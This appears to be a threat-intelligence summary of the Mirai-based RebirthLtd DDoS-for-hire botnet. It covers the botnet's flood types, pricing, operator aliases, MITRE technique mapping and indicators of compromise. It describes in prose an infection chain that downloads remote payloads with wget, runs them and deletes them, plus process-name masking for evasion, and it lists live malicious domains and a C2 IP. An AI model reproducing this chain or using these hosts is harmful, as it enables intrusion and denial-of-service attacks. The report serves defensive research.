Threat Research

DDoS-as-a-Service: The Rebirth Botnet

Sysdig

Sysdig Threat Research Team uncovered a mature DDoS-as-a-Service botnet called RebirthLtd (also known as RebirthHub), built on Mirai and marketed via Telegram and an online storefront. The operation monetizes access to a multi-attack botnet aimed largely at gaming servers and streamers, with a public-facing ecosystem that includes packages, API access, and C2 infrastructure.
#RebirthLtd #Mirai #RebirthHub #TsukiBotnet

Keypoints

  • The RebirthLtd DDoS botnet is based on Mirai and sold as a service via Telegram and the rebirthltd.mysellix.io storefront, targeting video game servers and streamers.
  • Attack capabilities include a broad set of floods and spoofing techniques: tcpbypass, ovhtcp, tcptfo, handshake, tcpreflect, tcprst, udpbypass, socket, gamep, udpflood, ackflood, synflood, and wraflood.
  • Plans start at $15, with higher tiers offering API access, C2 servers, and higher attack rates per second.
  • RebirthLtd is tracked by tumult.network (top 5 for total requests); operators use multiple aliases and domains, with strong ties to the gaming community and a potential affiliate network.
  • Leadership and affiliation details point to a Telegram user “CazzG” (also tied to estresse.pro) and other monikers like “Docx69,” “prixnuke,” and “R00TK,” indicating a merged ecosystem of operators and buyers.
  • Infection methods rely on bash scripts downloaded via wget from remote servers, with BusyBox variants to evade detection, and a large collection of ELF payloads; executions often purge traces afterward (rm -rf).
  • Dynamic analysis shows prctl-based process name masking (/bin/bash), network scanning of /proc/net/tcp, and a local listener on port 8345 to coordinate infected devices for DDoS activity.

MITRE Techniques

  • [T1059.004] Unix Shell – The malware is delivered and executed via a bash script that downloads and runs payloads. “The malicious ELFs are spread on a target system by downloading and executing a bash script, whose code remains the same in all campaigns.”
  • [T1036] Masquerading – The malware uses prctl to set the process name to /bin/bash to evade detection. “the prctl system call was used to set the process name as /bin/bash to evade detection by security tools.”
  • [T1105] Ingress Tool Transfer – The dropper fetches multiple files from a remote server with wget, then chmod +x and executes them, removing them afterward. “download multiple files from a remote server using wget… After downloading each file, it sets execute permissions (chmod +x) and executes them (./filename). These files are then removed (rm -rf) after execution.”
  • [T1027] Obfuscated/Compressed Files and Information – A BusyBox-based variant is used to reduce detection, exploiting BusyBox built-ins. “This may be a recent introduction that aims to minimize detection risks by taking advantage of the many busybox built-in commands.”
  • [T1070.004] File Deletion – The malware removes dropped payloads after execution. “These files are then removed (rm -rf) after execution.”
  • [T1046] Network Service Discovery – The malware reads /proc/net/tcp to discover active connections and potential targets. “The malware performs a large number of read operations on the /proc/net/tcp file, one byte at a time… identifying open ports and potential targets for infection.”

Indicators of Compromise

  • [Domain] rebirthltd.com – core botnet domain used to coordinate services
  • [Domain] rebirthltd.mysellix.io – storefront domain for subscribing to the botnet
  • [Domain] tumult.network – DDoS monitoring site tracking botnets (top 5)
  • [Domain] tsuki.army – domain referenced for advertising a secondary botnet
  • [Domain] rebirthbot.icu – C2 domain referenced in earlier campaigns
  • [IP Address] 93.123.85.149 – Mirai C2 IP associated with the domain activity
  • [Domain] yosh.ltd; [Domain] yoshiproxy.ltd; [Domain] yoshservices.ltd – domains observed in Rebirth-related attacks
  • [Domain] shop4youv2.de – domain tied to the FBI takedown Operation PowerOFF
  • [File] rebirth.mips; rebirth.mpsl – payload files downloaded by the dropper
  • [File] rebirth.sh4 – another payload filename observed in campaigns
  • [Executable] arm4; l1arm4 – naming prefixes used for ELF variants
  • [Telegram Username] CazzG; Docx69 – actors/admins linked to the Rebirth ecosystem

Read more: https://sysdig.com/blog/ddos-as-a-service-the-rebirth-botnet/

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint